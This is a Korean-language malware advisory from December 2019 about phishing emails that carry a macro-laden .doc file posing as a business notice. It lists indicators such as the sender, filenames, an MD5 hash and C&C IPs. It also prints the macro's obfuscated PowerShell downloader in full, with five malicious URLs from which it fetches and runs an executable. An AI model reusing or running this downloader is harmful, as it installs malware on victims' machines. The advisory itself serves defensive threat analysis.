보안분석 : doc 매크로 파일을 위장한 악성메일 유포 주의 (2019.12.03)

최근 타켓형 악성메일과 특정 기업을 사칭한 악성메일이 꾸준히 발생을 하고 있으므로, 사용자들의 주의가 필요할것으로 보입니다.

발신자 : doaa.shaban@ten.tv (지속적으로 변경되고 있음)

제목 : 통보 76386154-20191203 (변경가능)

첨부파일명 : 통보 76386154-20191203.doc (변경가능)

해당 메일확인시 통보 (임의숫자).doc 파일을 포함하고 있으며, 본문에는 업무성 메일로 위장을 하고 있어 사용자가

첨부파일을 열도록 유도를 하고 있습니다.

문서를 열경우 파워쉘을 이용하여 악성파일을 다운로드 받으며, 해당 악성파일은 추가로 외부와

통신을 하여 추가 악성행위를 수행하도록 설정되어 있습니다.

filename: C:\Users\admin\105.exe md5: 48ca152884250a5a2dd576ed401493df

name: C:\Users\admin\105.exe newname: C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe

C&C 서버 연결

URL: /A8JJ0E METHOD: POST Referer:hxxp://72.69.99.47/A8JJ0E

$Lyownuuozqios='Iyglkftbmf';$Qhlyalaab = '105';$Nkuaxpqjrs='Fivrhtsaodct';$Lvctlbhgofnzw=

$env:userprofile+'\'+$Qhlyalaab+'.exe';$Qrwcqkakbo='Qchcqgosf';$Ppxuanna=.

('ne'+'w'+'-obje'+'ct') NEt.webcLiENT;$Zgrkbmfmklkid='https://junkfood.id/web/2cxr0-ubz56oa

-05736736/*https://onetech.asia/wp-content/plugins/jv-effect/js/OUUtTo/*http://cnthai.co.th/wp

-admin/images/7htrk8i8-y1v55-25/*http://rendevooapp.com/zdub/2fhaq65af-n96zm950-863/*

http://chonmua.com/wp-content/PTVDKC/'."sPl`IT"('*');$Jemjtwjiakmzy='Bhsuggvzcqt';foreach(

$Pmmykcoicnns in $Zgrkbmfmklkid){try{$Ppxuanna."DOwnloa`df`i`le"($Pmmykcoicnns, $Lvctlbh

gofnzw);$Wfxgstmxeb='Rguxedipaeg';If ((&('Ge'+'t'+'-Item') $Lvctlbhgofnzw)."l`enGth" -ge 20466

) {[Diagnostics.Process]::"ST`ARt"($Lvctlbhgofnzw);$Rnektzkxlvm='Farwglgpz';break;$Xmlwlryw='Bzt

thhdu'}}catch{}}$Kzwcpjhapdasm='Gooluxqjeea')

첨부파일에 포함된 VBA 매크로 소스코드

동작방식

네트워크 통신

IP : 103.27.206.196 IP : 3.114.91.202 IP : 72.69.99.47

이처럼 정상메일로 위장할 경우 사용자는 의심을 하지 않고 문서를 열어보게 됩니다. 현재 해당 파일은

다수의 백신에서 악성으로 탐지를 하고 있으며 항상 백신은 최신으로 유지하시고, 의심가는 메일은 열람

을 하지 않는것이 좋을것 같습니다.